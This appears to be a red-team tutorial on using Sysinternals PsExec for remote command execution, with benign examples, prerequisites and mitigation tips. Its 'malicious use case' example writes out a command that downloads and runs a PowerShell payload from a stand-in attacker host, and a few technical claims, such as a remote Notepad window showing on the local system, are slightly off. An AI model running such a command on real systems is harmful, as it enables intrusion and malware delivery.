Psexec for Remote Code Execution

As a red teamer or a pen tester, one of your primary objectives is to identify and exploit vulnerabilities in your target systems. One way to do this is by using remote code execution (RCE) techniques. Remote code execution is a vulnerability that allows an attacker to execute code on a target system remotely. There are several tools and techniques available to achieve RCE, and one of the most commonly used is PsExec. In this article, we will explore what PsExec is, how it works, and how it can be used by a red teamer or a pen tester to achieve RCE on a target system.

What is PsExec?

PsExec is a powerful command-line tool developed by Sysinternals (now owned by Microsoft) that allows system administrators to execute processes remotely on one or more machines in a network. PsExec can be used to run commands, start services, or launch applications on remote systems. It works by using a combination of Windows APIs and remote procedure calls (RPCs) to establish a connection with a remote machine and then execute a command or a process on that machine.

How PsExec Works

To understand how PsExec works, let’s look at the different steps involved in using PsExec to execute a command remotely:

Step 1: Establishing a Connection

The first step in using PsExec is to establish a connection with the target system. To do this, PsExec uses the Windows Service Control Manager (SCM) to start a service called PsExecSvc on the target system. PsExecSvc is a small service that runs as the Local System account and listens for incoming connections from PsExec.

Step 2: Authenticating

Once the connection is established, PsExec sends authentication credentials to the target system to authenticate the user who is trying to access the system. The credentials can be provided in several ways, including by using the -u and -p command-line switches, which allow you to specify a username and password, respectively.

Step 3: Executing the Command

After the user is authenticated, PsExec executes the command on the remote system. The command can be any valid command or executable file that can be executed on the target system. PsExec captures the output of the command and displays it on the local system.

Examples of PsExec Usage

Now that we understand how PsExec works, let’s look at some examples of how it can be used in a red team or pen testing scenario.

Example 1: Retrieving System Information

One of the simplest things you can do with PsExec is to retrieve system information from a remote system. For example, to retrieve the system information of a machine with the IP address 192.168.1.100, you can run the following command:

psexec \\192.168.1.100 systeminfo

This command will connect to the remote system, execute the systeminfo command, and display the results on your local system.

Example 2: Running Commands on Multiple Systems

PsExec also allows you to run commands on multiple systems simultaneously. For example, to execute the ipconfig command on three remote systems with IP addresses 192.168.1.100, 192.168.1.101, and 192.168.1.102, you can run the following command:

psexec \\192.168.1.100,192.168.1.101,192.168.1.102 ipconfig

This command will execute the ipconfig command on all three remote systems and display the results on your local system.

Example 3: Launching Applications

PsExec can also be used to launch applications on remote systems. For example, to launch the notepad.exe application on a remote system with IP address 192.168.1.100, you can run the following command:

psexec \\192.168.1.100 notepad.exe

This command will launch the Notepad application on the remote system and display it on your local system.

Example 4: Starting Services

PsExec can also be used to start services on remote systems. For example, to start the Windows Remote Management (WinRM) service on a remote system with IP address 192.168.1.100, you can run the following command:

psexec \\192.168.1.100 net start winrm

This command will start the WinRM service on the remote system.

Example 5: Malicious Use Case

While PsExec can be a useful tool for system administrators, it can also be used maliciously by attackers to achieve RCE on a target system. For example, an attacker could use PsExec to execute a malware payload on a remote system by running the following command:

psexec \\192.168.1.100 cmd.exe /c "powershell.exe -ExecutionPolicy Bypass -Command \"iex (New-Object Net.WebClient).DownloadString('http://attacker.com/malware.ps1')\""

This command will connect to the remote system, execute the cmd.exe command, and then execute a PowerShell script that downloads and executes a malware payload from a remote server controlled by the attacker. This technique is known as a “fileless” malware attack, as it does not involve writing any files to the target system’s disk.

Prerequisites

Before using PsExec to execute commands remotely on a target system, there are several prerequisites that must be met:

Network Connectivity: PsExec requires network connectivity between the local system and the target system. Make sure that the target system is reachable from the local system and that there are no network firewalls or restrictions that could prevent the connection.
Administrative Access: PsExec requires administrative access to the target system. Make sure that you have administrative privileges on the target system or that you have access to an account with administrative privileges.
Windows Firewall: PsExec uses the Windows Service Control Manager (SCM) and remote procedure calls (RPCs) to establish a connection with the target system. Make sure that the Windows Firewall is not blocking these ports (TCP/445 and TCP/135).
PsExec Executable: PsExec is a standalone executable that can be downloaded from the Microsoft Sysinternals website. Make sure that you have the latest version of PsExec and that it is accessible from the command prompt or from the directory where you are executing the command.
Authentication Credentials: PsExec requires authentication credentials to connect to the target system. Make sure that you have a valid username and password or that you are using an account with administrative privileges.

By ensuring that these prerequisites are met, you can use PsExec to execute commands remotely on a target system and test the security of your environment.

Mitigating PsExec-Based Attacks

To mitigate PsExec-based attacks, there are several steps that system administrators can take, including:

Disable the PsExec service (PsExecSvc) on all machines that do not require its use.
Restrict the use of PsExec to authorized users and limit the systems that it can be used on.
Monitor network traffic for any signs of PsExec-based attacks, such as unusual connections to PsExec ports (TCP/445 and TCP/135).
Deploy endpoint protection solutions that can detect and block known PsExec-based attack techniques.

Conclusion

PsExec is a powerful tool that can be used by system administrators to remotely execute commands on multiple systems simultaneously. However, it can also be used maliciously by attackers to achieve RCE on a target system. Red teamers and pen testers can use PsExec to test the security of their target systems and identify vulnerabilities that could be exploited by attackers. By understanding how PsExec works and how it can be used, security professionals can better defend against PsExec-based attacks and protect their systems from compromise.

What is PsExec?¶

How PsExec Works¶

Step 1: Establishing a Connection¶

Step 2: Authenticating¶

Step 3: Executing the Command¶

Examples of PsExec Usage¶

Example 1: Retrieving System Information¶

Example 2: Running Commands on Multiple Systems¶

Example 3: Launching Applications¶

Example 4: Starting Services¶

Example 5: Malicious Use Case¶

Prerequisites¶

Mitigating PsExec-Based Attacks¶

Conclusion¶